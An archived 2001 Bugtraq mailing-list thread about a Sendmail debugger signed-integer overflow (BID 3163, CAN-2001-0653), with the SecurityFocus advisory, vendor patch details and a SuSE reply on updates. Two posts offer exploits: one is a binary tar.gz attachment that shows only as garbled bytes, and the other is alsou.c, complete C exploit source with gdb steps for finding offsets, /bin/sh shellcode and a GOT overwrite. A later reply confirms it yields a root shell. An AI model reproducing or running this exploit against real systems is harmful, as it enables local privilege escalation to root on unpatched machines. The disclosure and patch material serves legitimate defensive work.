6948730 2001-08-21 10:04 -0600 /309 rader/ Dave Ahmed <da@securityfocus.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21 18:27 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18881>
Ärende: *ALERT* UPDATED BID 3163 (URGENCY 6.58): Sendmail Debugger Arbitrary
------------------------------------------------------------
Code Execution Vulnerability (fwd)
From: Dave Ahmed <da@securityfocus.com>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.GSO.4.30.0108210958500.2723-100000@mail>
This alert is being posted to Bugtraq as our public release of the
vulnerability discovered in Sendmail by Cade Cairns
<cairnsc@securityfocus.com>.
---------------------------------------------------------------------------
Security Alert
Subject: Sendmail Debugger Arbitrary Code Execution Vulnerability
BUGTRAQ ID: 3163 CVE ID: CAN-2001-0653
Published: August 17, 2001 MT Updated: August 20, 2001 MT
Remote: No Local: Yes
Availability: Always Authentication: Not Required
Credibility: Vendor Confirmed Ease: No Exploit Available
Class: Input Validation Error
Impact: 10.00 Severity: 7.50 Urgency: 6.58
Last Change: Updated packages that rectify this issue are now
available
from Sendmail.
---------------------------------------------------------------------------
Vulnerable Systems:
Sendmail Consortium Sendmail 8.12beta7
Sendmail Consortium Sendmail 8.12beta5
Sendmail Consortium Sendmail 8.12beta16
Sendmail Consortium Sendmail 8.12beta12
Sendmail Consortium Sendmail 8.12beta10
Sendmail Consortium Sendmail 8.11.5
Sendmail Consortium Sendmail 8.11.4
Sendmail Consortium Sendmail 8.11.3
Sendmail Consortium Sendmail 8.11.2
Sendmail Consortium Sendmail 8.11.1
Sendmail Consortium Sendmail 8.11
Non-Vulnerable Systems:
Summary:
Sendmail contains an input validation error, may lead to the
execution of arbitrary code with elevated privileges.
Impact:
Local users may be able to write arbitrary data to process memory,
possibly allowing the execution of code/commands with elevated
privileges.
Technical Description:
An input validation error exists in Sendmail's debugging
functionality.
The problem is the result of the use of signed integers in the
program's tTflag() function, which is responsible for processing
arguments supplied from the command line with the '-d' switch and
writing the values to it's internal "trace vector." The vulnerability
exists because it is possible to cause a signed integer overflow by
supplying a large numeric value for the 'category' part of the debugger
arguments. The numeric value is used as an index for the trace vector.
Before the vector is written to, a check is performed to ensure
that the supplied index value is not greater than the size of the
vector. However, because a signed integer comparison is used, it
is possible to bypass the check by supplying the signed integer
equivalent of a negative value. This may allow an attacker to
write data to anywhere within a certain range of locations in
process memory.
Because the '-d' command-line switch is processed before the
program drops its elevated privileges, this could lead to a
full system compromise. This vulnerability has been successfully
exploited in a laboratory environment.
Attack Scenarios:
An attacker with local access must determine the memory offsets of
the program's internal tTdvect variable and the location to which
he or she wishes to have data written.
The attacker must craft in architecture specific binary code the
commands (or 'shellcode') to be executed with higher privilege. The
attacker must then run the program, using the '-d' flag to overwrite a
function return address with the location of the supplied shellcode.
Exploits:
Currently the SecurityFocus staff are not aware of any exploits for
this issue. If you feel we are in error or are aware of more recent
information, please mail us at: vuldb@securityfocus.com
<mailto:vuldb@securityfocus.com>.
Mitigating Strategies:
Restrict local access to trusted users only.
Solutions:
Below is a statement from the Sendmail Consortium regarding this
issue:
--------------------
This vulnerability, present in sendmail open source versions between
8.11.0 and 8.11.5 has been corrected in 8.11.6. sendmail 8.12.0.Beta
users should upgrade to 8.12.0.Beta19. The problem was not present in
8.10 or earlier versions. However, as always, we recommend using the
latest version. Note that this problem is not remotely exploitable.
Additionally, sendmail 8.12 will no longer uses a set-user-id root
binary by default.
--------------------
Updated packages that rectify this issue are available from the
vendor:
For Sendmail Consortium Sendmail 8.11:
Sendmail Consortium upgrade sendmail 8.11.6
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
For Sendmail Consortium Sendmail 8.11.1:
Sendmail Consortium upgrade sendmail 8.11.6
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
For Sendmail Consortium Sendmail 8.11.2:
Sendmail Consortium upgrade sendmail 8.11.6
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
For Sendmail Consortium Sendmail 8.11.3:
Sendmail Consortium upgrade sendmail 8.11.6
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
For Sendmail Consortium Sendmail 8.11.4:
Sendmail Consortium upgrade sendmail 8.11.6
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
For Sendmail Consortium Sendmail 8.11.5:
Sendmail Consortium upgrade sendmail 8.11.6
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
For Sendmail Consortium Sendmail 8.12beta10:
Sendmail Consortium upgrade sendmail 8.12.0 Beta19
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
For Sendmail Consortium Sendmail 8.12beta12:
Sendmail Consortium upgrade sendmail 8.12.0 Beta19
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
For Sendmail Consortium Sendmail 8.12beta16:
Sendmail Consortium upgrade sendmail 8.12.0 Beta19
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
For Sendmail Consortium Sendmail 8.12beta5:
Sendmail Consortium upgrade sendmail 8.12.0 Beta19
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
For Sendmail Consortium Sendmail 8.12beta7:
Sendmail Consortium upgrade sendmail 8.12.0 Beta19
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
Credit:
Discovered by Cade Cairns <cairnsc@securityfocus.com> of the
Security Focus SIA Threat Analysis Team.
References:
web page:
Sendmail Homepage (Sendmail)
http://www.sendmail.org/
ChangeLog:
Aug 20, 2001: Updated packages that rectify this issue are now
available from Sendmail.
Aug 20, 2001: Updated versions of Sendmail will be available today at
4:00 PDT.
Aug 09, 2001: Initial analysis.
---------------------------------------------------------------------------
HOW TO INTERPRET THIS ALERT
BUGTRAQ ID: This is a unique identifier assigned to the
vulnerability by SecurityFocus.com.
CVE ID: This is a unique identifier assigned to the
vulnerability by the CVE.
Published: The date the vulnerability was first made
public.
Updated: The date the information was last updated.
Remote: Whether this is a remotely exploitable
vulnerability.
Local: Whether this is a locally exploitable
vulnerability.
Credibility: Describes how credible the information about the
vulnerability is. Possible values are:
Conflicting Reports: The are multiple
conflicting about the existance of the
vulnerability.
Single Source: There is a single non-reliable
source reporting the existence of the
vulnerability.
Reliable Source: There is a single reliable
source reporting the existence of the
vulnerability.
Conflicting Details: There is consensus on the
existence of the vulnerability but not it's
details.
Multiple Sources: There is consensus on the
existence and details of the vulnerability.
Vendor Confirmed: The vendor has
confirmed the vulnerability.
Class: The class of vulnerability. Possible values are:
Boundary Condition Error, Access Validation Error,
Origin Validation Error, Input Valiadtion Error,
Failure to Handle Exceptional Conditions, Race
Condition Error, Serialization Error, Atomicity
Error, Environment Error, and Configuration Error.
Ease: Rates how easiliy the vulnerability can be
exploited. Possible values are: No Exploit
Available, Exploit Available, and No Exploit
Required.
Impact: Rates the impact of the vulnerability. It's range
is 1 through 10.
Severity: Rates the severity of the vulnerability. It's range
is 1 through 10. It's computed from the impact
rating and remote flag. Remote vulnerabiliteis with
a high impact rating receive a high severity
rating. Local vulnerabilities with a low impact
rating receive a low severity rating.
Urgency: Rates how quickly you should take action to fix or
mitigate the vulnerability. It's range is 1 through
10. It's computed from the severity rating, the
ease rating, and the credibility rating. High
severity vulnerabilities with a high ease rating,
and a high confidence rating have a higher urgency
rating. Low severity vulnerabilities with a low
ease rating, and a low confidence rating have a
lower urgency rating.
Last Change: The last change made to the vulnerability
information.
Vulnerable Systems: The list of vulnerable systems. A '+' preceding a
system name indicates that one of the system
components is vulnerable vulnerable. For example,
Windows 98 ships with Internet Explorer. So if a
vulnerability is found in IE you may see something
like: Microsoft Internet Explorer + Microsoft
Windows 98
Non-Vulnerable Systems: The list of non-vulnerable systems.
Summary: A concise summary of the vulnerability.
Impact: The impact of the vulnerability.
Technical Description: The in-depth description of the vulnerability.
Attack Scenarios: Ways an attacker may make use of the
vulnerability.
Exploits: Exploit intructions or programs.
Mitigating Strategies: Ways to mitigate the vulnerability.
Solutions: Solutions to the vulnerability.
Credit: Information about who disclosed the
vulnerability.
References: Sources of information on the vulnerability.
Related Resources: Resources that might be of additional value.
ChangeLog: History of changes to the vulnerability
record.
---------------------------------------------------------------------------
Copyright 2001 SecurityFocus.com
https://alerts.securityfocus.com/
(6948730) /Dave Ahmed <da@securityfocus.com>/(Ombruten)
6949602 2001-08-21 21:28 +0200 /82 rader/ Roman Drahtmueller <draht@suse.de>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21 21:51 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18890>
Kommentar till text 6948730 av Dave Ahmed <da@securityfocus.com>
Ärende: Re: *ALERT* UPDATED BID 3163 (URGENCY 6.58): Sendmail Debugger
------------------------------------------------------------
Arbitrary Code Execution Vulnerability (fwd)
From: Roman Drahtmueller <draht@suse.de>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0108212117080.9532-100000@dent.suse.de>
>
> Subject: Sendmail Debugger Arbitrary Code Execution Vulnerability
[...]
> Vulnerable Systems:
>
> Sendmail Consortium Sendmail 8.12beta7
> Sendmail Consortium Sendmail 8.12beta5
> Sendmail Consortium Sendmail 8.12beta16
> Sendmail Consortium Sendmail 8.12beta12
> Sendmail Consortium Sendmail 8.12beta10
> Sendmail Consortium Sendmail 8.11.5
> Sendmail Consortium Sendmail 8.11.4
> Sendmail Consortium Sendmail 8.11.3
> Sendmail Consortium Sendmail 8.11.2
> Sendmail Consortium Sendmail 8.11.1
> Sendmail Consortium Sendmail 8.11
[...]
> Non-Vulnerable Systems:
Some part is missing here...
> Summary:
>
> Sendmail contains an input validation error, may lead to the execution
> of arbitrary code with elevated privileges.
[...]
> --------------------
> This vulnerability, present in sendmail open source versions between
> 8.11.0 and 8.11.5 has been corrected in 8.11.6. sendmail 8.12.0.Beta
> users should upgrade to 8.12.0.Beta19. The problem was not present in
> 8.10 or earlier versions. However, as always, we recommend using the
> latest version. Note that this problem is not remotely exploitable.
> Additionally, sendmail 8.12 will no longer uses a set-user-id root
> binary by default.
> --------------------
[...]
SuSE are currently working on update packages for the 7.0, 7.1 and 7.2
distributions (which are affected). The supported distributions 6.3 and
6.4 come with sendmail-8.9.3 which does not seem to be vulnerable to this
problem. The packages should be available shortly at
ftp://ftp.suse.com/pub/suse/i386/update/*.
Offtopic and mentioned here to keep the noise down (in.telnetd):
The 7.x distribution update directories contain update packages for
the recently discovered in.telnetd security problem (buffer
overflow). While we are working for a solution for the 6.x
distribution, the available packages are ready for use. It is
recommended to apply these updates as soon as possible. The packages
for the 7.1 distribution are called nkitserv.rpm, for 7.2 it's called
telnet-server.rpm. The packages for the 6.x distributions prove to
worksome because of a much older codebase and changed behaviour of
parts of the glibc. We hope to be able to provide a suitable solution
soon.
We recommend to disable the telnet service by commenting it out from
the /etc/inetd.conf file (with a following "killall -HUP inetd" to
make inetd re-read its config file) until an update package for your
distribution is available. If you do not need the telnet server
service, you should leave the service disabled even if you have
applied an update package to your system.
Thanks,
Roman Drahtmüller,
SuSE Security.
--
- -
| Roman Drahtmüller <draht@suse.de> // "Caution: Cape does |
SuSE GmbH - Security Phone: // not enable user to fly."
| Nürnberg, Germany +49-911-740530 // (Batman Costume warning label) |
- -
(6949602) /Roman Drahtmueller <draht@suse.de>/(Ombruten)
6955800 2001-08-22 21:02 +0300 /16 rader/ Lucian Hudin <luci@warp.transart.ro>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-22 20:35 av Brevbäraren
Extern mottagare: Dave Ahmed <da@securityfocus.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18904>
Kommentar till text 6948730 av Dave Ahmed <da@securityfocus.com>
Ärende: sample exploit....Re: *ALERT* UPDATED BID 3163 (URGENCY 6.58):
------------------------------------------------------------
Sendmail Debugger Arbitrary Code Execution Vulnerability (fwd)
this is a simple slack sendmail exploit (rh 7.1 offste alos included)
it's so funny to see an old bug striking again...
Regards,
LucySoft Inc.
www : http://www.darkpath.com
mail: luci@transart.ro (work), luci@darkpath.com (home)
(6955800) /Lucian Hudin <luci@warp.transart.ro>/----
Bilaga (application/octet-stream) i text 6955801
6955801 2001-08-22 21:02 +0300 /9 rader/ Lucian Hudin <luci@warp.transart.ro>
Bilagans filnamn: "xp.tar.gz"
Importerad: 2001-08-22 20:35 av Brevbäraren
Extern mottagare: Dave Ahmed <da@securityfocus.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18905>
Bilaga (text/plain) till text 6955800
Ärende: Bilaga (xp.tar.gz) till: sample exploit....Re: *ALERT* UPDATED BID 3163 (URGENCY 6.58):
------------------------------------------------------------
Sendmail Debugger Arbitrary Code Execution Vulnerability (fwd)
���ã;��xp.tar�íY{oÛ6�ï¿ã§¸¹Ig'õM-k�l@²uI�X»(Kµ$z¢�+èúÝw¤�Vâô1�É6Ô´È»ãñø;ÞÊçú£û&Ãè�CÃÀ_Ã��wå¯aözê·¤GÆp��fϦ±?пwË2Ò�àQ9ÁÇùX"� ¥|®çó®s¯càz�b½ïZÿ~_¶UëßÃgÓ´Þ#0îÕª¾ðõ'ú����Dó`±�Ñ ��æ|Æ�LYÌ�ò�ìk8Íë�î¥]"e\æÑ,L{`©��DH��»ÆRÕ¨k]�¤DÂ\¦��q# Ôu�&�LÀÈáPs`(Î �¸,£ ·Æ¨4_ó�ϳÐ
óYÑÉ#��w�2cú�Ã/xIW¯Äõ4¡�ë:ØHºH@|F�F#ØO/½N·Íñàà)Dü
M�Ùm[¦7Ò6�Ôܬæ¶��¹]æHî�<^gw©QòhFî�4jo2{Þ©ÆVCHñ6WfÈnwÙm��j©^Cj´j|�§9D¾Bú}Iê]ýú�ü�|Æcï$@xÌS\�¹ �ÁfÀ¯X²H4eq!Å�6AÊe6�q®Ç�T
.³³)Ð$¡×˱¨âJËÕôx�» ÇÖ$�¦®
o1@!×{¹eã�
!d"S*Í%p!Uw 5
�i�ÌçÌ�3
¨�AD�?K¬àD3!�"EÝÀóXÂp�
/Ð6´ÆÎR�Òo�P�ÌarB��ãà�¥ÑJÛoÝ�
CHÏD¢�;kÐÁ�¨KETÙ�#iâø�¼J\��u¡ËJ�j+È8¡ÖV¸ë¨ÂÕê� h�ÍVRb)U
8
� ² .Ñ+jôÞBÚSp*
Þ�®Ö�¢ÆRÈ2$z�?
ôÞi-ÕÀ¼e-í3Îq��Ö
�V¯i¸×<ý�O�yRXB��*UÝ�ÙÒ
ÜE<Fµa�Ù�©�ð®@ãÓdK¢Êñpãjéi9´µ§Úeóoî×å;vÊ÷òu�d�´�ÎSÈb�Lc&·/\ï:Ì&E´)3nó�û
rã9Ø#ÈhCdÅmù@©£A1�>_ýöºCÞÕs�3
·ÌÀK÷êÖ�P\êºgr°%÷Â�¶g°¯�ëÔ�ïV\�xÐn��0meÎìµ�b�N�<ª¶Á¬ÔuV´¬ê¨ö�¦§°Ô¿m¾îì}Pb �¼vk«lº¯âV¾}D�mõá~Ç)&5¶Êñ|¾_Ê-ì�;F�Æ^©Y*Ú7Ã�gú¤�Ùgy©4h²+7}ì?qÔ®íí½¥÷Þ70)co~ÝÆ��s|�ðç]m«ÓP
«¶D³±Wà�ÅC�·U
×.ß�ÖÎ�ücØ�¥0¼åʹnwÓ�ô/©�ô�7É.�£h£��ÊÎ;m6ö>i
EævûFlwê
æà ��'-�/E·j.�
�èYãÞx0´Æ}Ø©bn��®öVÁ½â0+=y�èßòÉM °F7üu��
¹Á6t4»ZâF×R¾´�×ú£[Ul4JO^1PI@dh),pe3¬®L¾àÉ���ë�ù¦°â=ù·KExþÃ�ÿ~Çç¿a¿ÿÁó`Õç?Ë�Êó�>®Ï�AäòìùÑç�À¹I.~8>=èr�µ©ðÉñËãg/.�¿?=l�¼:_àu�Ö¸�ÔPu«0
$¨aY$¹A�;ó�K¡»0��ë�A
ûûoÎ^¼|��EIE~_2±£
a�@¯+�°ã'�¸ÏiêOô¿ñ÷7�noäÂ
ç¯6¶¾zµñ8ä�
áÕÆSüg3õªÁóÉÆrZ�LBqtrv¸è?Õÿüîç�5¸�ÇW'
Nõ�ÜD=hp.�/¹jÂ�Þ�.'G?]èç'ÏF¥¿Üy��¸ß�6�"jvÿ°¯
ã_-ç}^�}âþ��ûeü÷ú)ã0Ø]ÇÿCP}|h��0Åc�k�ÍlÈÒiÙT·aáµÛeîÃ,oà_CLEúm�&ÿN�ü²IÝÿ÷;Ƨò¿¹[ßÿâ>!ïÿMÓ²Öñÿ�ôøëeª']Y�©ãÀ�ª"(ò�Y¢ê��_�ä*>PÀNH�
ð:ºÿ�ñ~|xtv|c|*ÿï�uýß+ò¿µÎÿ�CÍ��±ÈßZ|�í
îx4â�Ûú*E^Û�¿²�Ëç �GL�bå%põ±
m��ìÚ!S�«·¾��;}(*òòû�0Ü:8ê��§ò³P���ºtÒ4à±¼]çhV"àçêÀm3yª§ÁÔO˲_S¦7ùqú
©o÷]6G�h¬>Y³)2�4¸úµÞ£Ö´¦5iMkZÓG�Í[N=�(��
(6955801) /Lucian Hudin <luci@warp.transart.ro>/(Ombruten)
6957305 2001-08-23 04:40 +0400 /5 rader/ Alexander Yurchenko <grange@rt.mipt.ru>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-23 03:30 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18913>
Ärende: Another sendmail exploit
------------------------------------------------------------
Here's an another sendmail exploit for linux x86.
Alexander Yurchenko aka grange
(6957305) /Alexander Yurchenko <grange@rt.mipt.ru>/-
Bilaga (text/plain) i text 6957306
6957306 2001-08-23 04:40 +0400 /107 rader/ Alexander Yurchenko <grange@rt.mipt.ru>
Bilagans filnamn: "alsou.c"
Importerad: 2001-08-23 03:30 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18914>
Bilaga (text/plain) till text 6957305
Ärende: Bilaga (alsou.c) till: Another sendmail exploit
------------------------------------------------------------
/*
* alsou.c
*
* sendmail-8.11.x linux x86 exploit
*
* To use this exploit you should know two numbers: VECT and GOT.
* Use gdb to find the first:
*
* $ gdb -q /usr/sbin/sendmail
* (gdb) break tTflag
* Breakpoint 1 at 0x8080629
* (gdb) r -d1-1.1
* Starting program: /usr/sbin/sendmail -d1-1.1
*
* Breakpoint 1, 0x8080629 in tTflag ()
* (gdb) disassemble tTflag
* .............
* 0x80806ea <tTflag+202>: dec %edi
* 0x80806eb <tTflag+203>: mov %edi,0xfffffff8(%ebp)
* 0x80806ee <tTflag+206>: jmp 0x80806f9 <tTflag+217>
* 0x80806f0 <tTflag+208>: mov 0x80b21f4,%eax
* ^^^^^^^^^^^^^^^^^^ address of VECT
* 0x80806f5 <tTflag+213>: mov %bl,(%esi,%eax,1)
* 0x80806f8 <tTflag+216>: inc %esi
* 0x80806f9 <tTflag+217>: cmp 0xfffffff8(%ebp),%esi
* 0x80806fc <tTflag+220>: jle 0x80806f0 <tTflag+208>
* .............
* (gdb) x/x 0x80b21f4
* 0x80b21f4 <tTvect>: 0x080b9ae0
* ^^^^^^^^^^^^^ VECT
*
* Use objdump to find the second:
* $ objdump -R /usr/sbin/sendmail |grep setuid
* 0809e07c R_386_JUMP_SLOT setuid
* ^^^^^^^^^ GOT
*
* Probably you should play with OFFSET to make exploit work.
*
* Constant values, written in this code found for sendmail-8.11.4
* on RedHat-6.2. For sendmail-8.11.0 on RedHat-6.2 try VECT = 0x080b9ae0 and
* GOT = 0x0809e07c.
*
* To get r00t type ./alsou and then press Ctrl+C.
*
*
* grange <grange@rt.mipt.ru>
*
*/
#include <sys/types.h>
#include <stdlib.h>
#define OFFSET 1000
#define VECT 0x080baf20
#define GOT 0x0809f544
#define NOPNUM 1024
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
unsigned int get_esp()
{
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[])
{
char *egg, s[256], tmp[256], *av[3], *ev[2];
unsigned int got = GOT, vect = VECT, ret, first, last, i;
egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
if (egg == NULL) {
perror("malloc()");
exit(-1);
}
sprintf(egg, "EGG=");
memset(egg + 4, 0x90, NOPNUM);
sprintf(egg + 4 + NOPNUM, "%s", shellcode);
ret = get_esp() + OFFSET;
sprintf(s, "-d");
first = -vect - (0xffffffff - got + 1);
last = first;
while (ret) {
i = ret & 0xff;
sprintf(tmp, "%u-%u.%u-", first, last, i);
strcat(s, tmp);
last = ++first;
ret = ret >> 8;
}
s[strlen(s) - 1] = '\0';
av[0] = "/usr/sbin/sendmail";
av[1] = s;
av[2] = NULL;
ev[0] = egg;
ev[1] = NULL;
execve(*av, av, ev);
}
(6957306) /Alexander Yurchenko <grange@rt.mipt.ru>/-
6961052 2001-08-23 09:33 +0200 /50 rader/ Michael Kjorling <michael@kjorling.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-23 16:30 av Brevbäraren
Extern mottagare: Bugtraq <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <18919>
Kommentar till text 6957305 av Alexander Yurchenko <grange@rt.mipt.ru>
Ärende: Re: Another sendmail exploit [local root compromise]
------------------------------------------------------------
From: Michael Kjorling <michael@kjorling.com>
To: Bugtraq <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0108230920350.8982-100000@varg.wolfpack>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Sendmail 8.11.4 on Red Hat 6.2 and kernel 2.2.18 confirmed vulerable
to this local root exploit with mail's shell both blank (meaning
/bin/bash) and /usr/sbin/smrsh 8.11 (Berkeley) 5/19/1998. I got dumped
into a root bash shell both times when starting this program as an
ordinary user. Sendmail 8.11.6 on same platform is confirmed *not* to
be vulerable under the same two setups (with and without smrsh). smrsh
with 8.11.6 does not have an explicit version number but mentions
@(#)$Id: smrsh.c,v 8.31.4.9 2001/04/24 04:11:51 ca Exp $.
Is this the command line processing but mentioned at
http://www.sendmail.org/8.11.html?
Michael Kjörling
On Aug 23 2001 04:40 +0400, Alexander Yurchenko wrote:
> Here's an another sendmail exploit for linux x86.
>
> Alexander Yurchenko aka grange
- --
Michael Kjörling - michael@kjorling.com - PGP: 8A70E33E
Manager Wolf.COM -- Programmer -- Network Administrator
"We must be the change we wish to see" (Mahatma Gandhi)
^..^ Support the wolves in Norway -- go to ^..^
\/ http://home.no.net/ulvelist/protest_int.htm \/
***** Please only send me emails which concern me *****
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For my PGP key: http://michael.kjorling.com/contact/pgp.html
iD8DBQE7hLHfKqN7/Ypw4z4RAnclAJsEAoj0h7SKvLpyYBttCwXPAP5pJACfdysX
7y05P5ILqXr2E+aRRkW6Ev4=
=uf78
-----END PGP SIGNATURE-----
(6961052) /Michael Kjorling <michael@kjorling.com>/-